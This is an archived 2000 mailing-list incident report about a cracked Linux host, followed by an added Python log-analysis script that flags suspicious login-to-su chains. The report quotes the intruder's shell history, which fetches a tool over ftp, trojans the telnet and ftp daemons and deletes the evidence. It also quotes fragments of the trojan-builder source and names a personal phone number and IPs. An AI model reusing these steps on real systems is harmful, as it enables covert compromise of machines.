Security Incidents mailing list archives
Re: succesful crack
From: icon94 () HOTMAIL COM (icon xxeti)
Date: Thu, 17 Feb 2000 22:09:03 GMT
Welcome to the club. Some sort of trend going on here.
From: Bob Lockie <bjlockie () NORTELNETWORKS COM>
Reply-To: Bob Lockie <bjlockie () nortelnetworks com>
To: INCIDENTS () SECURITYFOCUS COM
Subject: succesful crack
Date: Tue, 15 Feb 2000 14:59:24 -0500

rjlockie () home net
(613) 765-5409

My box (24.112.89.219) was cracked. The attack originated from 24.11.98.152 (c505000-a.blfld1.ct.home.com). It could be this machine was also cracked and it was used as a launching point. Please contact the owner and have a talk with them. The owner should definitely not offer anonymous ftp service.

A few things were left on my system.

    drwxr-xr-x 2 root root 1024 Feb 13 22:03 ADMROCKS

I have no /etc/host.allow or /etc/hosts.deny files anymore.

This was in /tmp/,bash_history.

    ftp 24.11.98.152
    tar -xvf btm.tar
    make
    ./btm /usr/sbin/in.telnetd
    ./btm /usr/sbin/in.ftpd
    rm -rf btm.tar

The following source:

    /* bin trojan maker */
    #include "btm.h"

    #define BTM_VER "btm v1.5"

    int options=0;

    void usage(char* progname)
    {
      printf("usage: %s [-d] [-D define line] [-c] [-l max] [-v] [-u compiler]"
             " [-o compiler options] target [trojan source]\n",progname);
      printf("in trojan source, the trojan function must be:\n");
      printf("  "TROJAN_FCT"(char** argv,char** envp)\n");
      printf("\n");
      printf("-d: debug mode\n");
      printf("-c: don't trojan, just put the C file on stdout\n");
      printf("-l max: max number of char in a line of the C file\n");
      printf("-v: display version\n");
      printf("-u compiler: use this compiler\n");
      printf("-o options: options for compiler\n");
      printf("-n: no save for target file\n");
      printf("-e: echo commands\n");
      printf("-m comments: put comments in btmized file\n");
      printf("\n");
      exit(0);
    }

    int getdirname(char* dirname,char* filename,size_t dirname_size)
    {
      if (!filename)
        return -1;
      if (filename[0]=='/')
      {
        strncpy(dirname,filename,dirname_size);
        *(((char*)strrchr(dirname,'/'))+1)=0;
      }
      else
      {
        if (!getcwd(dirname,dirname_size))
        {
          perror("getcwd");
          return -1;
        }
      }
      return 0;
    }

/var/log/secure

    Feb 14 01:04:23 gw PAM_pwdb[6868]: (login) session opened for user tek by (uid=0)
    Feb 14 01:04:25 gw PAM_pwdb[6883]: (su) session opened for user own by tek(uid=5000)

Bob Lockie
bjlockie () nortelnetworks com
Live long and prosper.
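The /var/log/secure excerpt in the report shows a login for "tek" followed two seconds later by an su from "tek" to "own", an account the owner does not mention creating. The script below is an added example and is not part of the original thread or the tools it mentions: it parses PAM_pwdb session lines of exactly that shape, correlates each su with the login session of the user who issued it, and lists sessions for accounts outside an expected set. The sample log embeds the two lines from the report plus one constructed "session closed" line as a non-suspicious control; the expected-account set and the five-minute correlation window are assumptions chosen for the example.

```python
import re
from dataclasses import dataclass
from datetime import datetime
from typing import List, Optional, Set, Tuple

# Constructed sample: the two lines quoted in the report, plus a third
# "session closed" line added here as an ordinary, non-suspicious event.
SAMPLE_SECURE_LOG = """\
Feb 14 01:04:23 gw PAM_pwdb[6868]: (login) session opened for user tek by (uid=0)
Feb 14 01:04:25 gw PAM_pwdb[6883]: (su) session opened for user own by tek(uid=5000)
Feb 14 09:12:00 gw PAM_pwdb[7001]: (login) session closed for user tek
"""

# PAM_pwdb session line as written by the pam_pwdb module of that era:
#   <ts> <host> PAM_pwdb[<pid>]: (<service>) session <opened|closed> for user <u> [by <who>(uid=<n>)]
# "by (uid=0)" with no user name is how PAM printed a session opened by root itself.
PAM_SESSION_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) PAM_pwdb\[(?P<pid>\d+)\]: "
    r"\((?P<service>\w+)\) session (?P<action>opened|closed) for user (?P<user>\S+)"
    r"(?: by (?P<by>\S*)\(uid=(?P<uid>\d+)\))?"
)


@dataclass
class PamSession:
    ts: datetime
    host: str
    pid: int
    service: str          # "login", "su", ...
    action: str           # "opened" or "closed"
    user: str             # account the session is for
    by_user: str          # account that opened it ("" when PAM printed none)
    by_uid: Optional[int] # uid of the opener, None on "closed" lines


def parse_pam_sessions(text: str, year: int = 2000) -> List[PamSession]:
    """Parse PAM_pwdb session lines; syslog omits the year, so it is a parameter."""
    sessions = []
    for line in text.splitlines():
        m = PAM_SESSION_RE.match(line)
        if not m:
            continue  # not a PAM session line; other secure-log noise is ignored
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        sessions.append(PamSession(
            ts=ts, host=m["host"], pid=int(m["pid"]),
            service=m["service"], action=m["action"], user=m["user"],
            by_user=m["by"] or "", by_uid=int(m["uid"]) if m["uid"] else None,
        ))
    return sessions


def find_su_chains(sessions: List[PamSession],
                   window_seconds: int = 300) -> List[Tuple[PamSession, PamSession]]:
    """Pair each su with the login session, on the same host, of the user who ran it.

    Returns (login, su) tuples where the su happened within window_seconds of the
    login. An interactive login followed almost immediately by su to another
    account is the pattern in the report and is worth a second look.
    """
    chains = []
    for su in sessions:
        if su.service != "su" or su.action != "opened":
            continue
        for login in sessions:
            if (login.service == "login" and login.action == "opened"
                    and login.host == su.host and login.user == su.by_user
                    and 0 <= (su.ts - login.ts).total_seconds() <= window_seconds):
                chains.append((login, su))
    return chains


def unexpected_accounts(sessions: List[PamSession], known: Set[str]) -> List[str]:
    """Accounts that had a session opened but are not in the administrator's known set."""
    seen = []
    for s in sessions:
        if s.action == "opened" and s.user not in known and s.user not in seen:
            seen.append(s.user)
    return seen


if __name__ == "__main__":
    parsed = parse_pam_sessions(SAMPLE_SECURE_LOG)
    for login, su in find_su_chains(parsed):
        print(f"{login.user} logged in at {login.ts:%H:%M:%S}, "
              f"su to {su.user} at {su.ts:%H:%M:%S} (uid={su.by_uid})")
    # Expected-account set is an assumption for the example.
    print("unknown accounts:", unexpected_accounts(parsed, {"root", "tek"}))
```

Run against a real /var/log/secure the year has to be supplied, since syslog timestamps omit it, and the known-account set should come from /etc/passwd as it was before the incident, not from the compromised host, because an intruder who trojans in.telnetd and in.ftpd can add accounts just as easily.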